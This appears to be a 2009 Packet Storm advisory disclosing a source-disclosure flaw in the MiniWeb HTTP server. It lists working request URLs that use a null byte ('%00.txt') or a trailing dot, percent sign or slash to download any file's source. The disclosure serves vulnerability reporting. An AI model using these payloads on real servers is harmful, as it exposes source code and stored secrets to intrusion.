Miniweb Source Disclosure

2009-04-16T00:00:00
ID PACKETSTORM:76740
Type packetstorm
Reporter e.wiZz!
Modified 2009-04-16T00:00:00

Description

                                        
                                            `######## Miniweb webserver Source Disclousure Vulnerabilities #########  
  
  
#######By: e.wiZz!  
  
#######Site: www.balcansecurity.com   
  
  
#######Found with ServMeNot (world's sexiest fuzzer :P :)  
  
  
  
In t3h wild...  
  
############################################  
  
#Site#: http://miniweb.sourceforge.net/  
  
#Info#: MiniWeb is a mini HTTP server implementation written in C language,   
featuring low system resource consumption, high efficiency, good flexibility and high   
portability. It is capable to serve multiple clients with a single thread, supporting GET  
and POST methods, authentication, dynamic contents (dynamic web page and page variable   
substitution) and file uploading.   
  
  
  
  
#######Vulnerabilities:  
  
Source disclousure:   
  
http://[inthewild]/index.htm%00.txt  
  
  
When i saw this i thought fuzzer pissed of :D but it works,you can download any file this like:  
  
http://[inthewild]/index.htm.  
http://[inthewild]/index.htm %  
http://[inthewild]/index.htm /   
  
cheers.  
`